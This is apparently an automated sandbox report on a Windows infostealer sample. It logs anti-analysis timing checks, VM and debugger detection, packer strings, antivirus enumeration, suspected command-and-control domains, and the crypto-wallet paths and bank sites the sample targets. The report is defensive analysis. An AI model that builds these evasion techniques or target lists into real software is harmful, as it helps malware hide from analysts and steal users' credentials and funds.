            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0BDB second address: 53D0BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0BE1 second address: 53D0BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0BE5 second address: 53D0BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0BE9 second address: 53D0BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8359A8BA2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0BFD second address: 53D0C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C01 second address: 53D0C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C05 second address: 53D0C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C0B second address: 53D0C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F618Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C1D second address: 53D0C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C6D second address: 53D0C8F instructions: 0x00000000 rdtsc 0x00000002 mov dh, F5h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F82E84F6195h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C8F second address: 53D0C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0C94 second address: 53D0CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F82E84F6199h 0x0000000c or eax, 2490AA66h 0x00000012 jmp 00007F82E84F6191h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov si, di 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0CD6 second address: 53D0D44 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F82E8EDE529h 0x00000008 jmp 00007F82E8EDE51Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007F82E8EDE528h 0x00000016 and ecx, 28604F98h 0x0000001c jmp 00007F82E8EDE51Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F82E8EDE525h 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0D44 second address: 53D0D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0D4A second address: 53D0D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0D4E second address: 53D0D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423D42 second address: 6423D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423D46 second address: 6423D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F82E84F6198h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423D64 second address: 6423D97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Eh 0x00000007 jng 00007F82E8EDE518h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F82E8EDE52Eh 0x00000017 jmp 00007F82E8EDE520h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6422D58 second address: 6422D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642303A second address: 6423040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423040 second address: 6423044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423044 second address: 6423055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jl 00007F82E8EDE522h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423055 second address: 642305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423441 second address: 6423445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423445 second address: 642344A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642344A second address: 64234AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE51Dh 0x00000009 jg 00007F82E8EDE516h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F82E8EDE526h 0x00000018 jns 00007F82E8EDE516h 0x0000001e jno 00007F82E8EDE516h 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F82E8EDE51Ch 0x0000002e pushad 0x0000002f jmp 00007F82E8EDE51Fh 0x00000034 push edi 0x00000035 pop edi 0x00000036 push esi 0x00000037 pop esi 0x00000038 push eax 0x00000039 pop eax 0x0000003a popad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64234AF second address: 64234B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F82E84F6186h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64234B9 second address: 64234BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423641 second address: 642364C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642364C second address: 642366F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE523h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642573A second address: 6425740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6425797 second address: 64257E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F82E8EDE51Ah 0x00000011 jmp 00007F82E8EDE526h 0x00000016 popad 0x00000017 nop 0x00000018 mov ecx, dword ptr [ebp+122D2FA1h] 0x0000001e push 00000000h 0x00000020 movzx edx, si 0x00000023 push 189229CDh 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d pop eax 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64257E4 second address: 6425870 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F82E84F618Ch 0x00000008 jl 00007F82E84F6186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 1892294Dh 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F82E84F6188h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 movsx edi, cx 0x00000034 push 00000003h 0x00000036 xor di, 15CFh 0x0000003b push 00000000h 0x0000003d sub dword ptr [ebp+122D1EFAh], edi 0x00000043 mov edx, dword ptr [ebp+122D2E49h] 0x00000049 push 00000003h 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007F82E84F6188h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 sub edi, dword ptr [ebp+122D2DC5h] 0x0000006b call 00007F82E84F6189h 0x00000070 je 00007F82E84F6198h 0x00000076 push eax 0x00000077 push edx 0x00000078 jg 00007F82E84F6186h 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6425870 second address: 6425883 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6425883 second address: 64258A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F82E84F6194h 0x00000008 jmp 00007F82E84F618Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64258A3 second address: 64258B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64258B2 second address: 64258B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64258B7 second address: 6425909 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edi 0x00000014 pop eax 0x00000015 mov edx, dword ptr [ebp+122D2D99h] 0x0000001b lea ebx, dword ptr [ebp+1245B682h] 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F82E8EDE518h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D36D8h], edx 0x00000041 xchg eax, ebx 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6425909 second address: 642590D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9B904 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9B9AE instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C3D5AD instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C625F8 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C4A615 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9B8B1 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 629DD3B instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 629DC7F instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64E489C instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6192Thread sleep time: -34017s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 5640Thread sleep time: -36018s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 776Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 2532Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6336Thread sleep time: -36018s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6408Thread sleep time: -38019s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, 00000000.00000003.2551794749.0000000006328000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552300440.000000000681D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550605764.000000000632F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552059195.000000000659C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2551382221.000000000659C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550866524.0000000006597000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2551116996.000000000632B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552547529.000000000632D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: file.exe, 00000000.00000003.2386357225.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2274062074.0000000001719000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2296160603.0000000001712000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2408998298.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2416625283.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2386567864.0000000001717000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2471408685.0000000001717000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: file.exe, 00000000.00000003.2323446900.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: file.exe, 00000000.00000003.2551794749.0000000006328000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552300440.000000000681D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550605764.000000000632F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552059195.000000000659C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2551382221.000000000659C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550866524.0000000006597000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2551116996.000000000632B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2552547529.000000000632D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: file.exe, 00000000.00000003.2323446900.0000000005D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: file.exe, 00000000.00000003.2247320202.0000000005210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
            Source: file.exe, 00000000.00000003.2247320202.0000000005210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
            Source: file.exe, 00000000.00000003.2247320202.0000000005210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
            Source: file.exe, 00000000.00000003.2247320202.0000000005210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
            Source: file.exe, 00000000.00000003.2247320202.0000000005210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000003.2416625283.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2471408685.0000000001717000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 4540, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: file.exe, 00000000.00000003.2386357225.0000000001715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
            Source: file.exe, 00000000.00000003.2386357225.0000000001715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: file.exe, 00000000.00000003.2386357225.0000000001715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: file.exe, 00000000.00000003.2386494891.0000000001775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
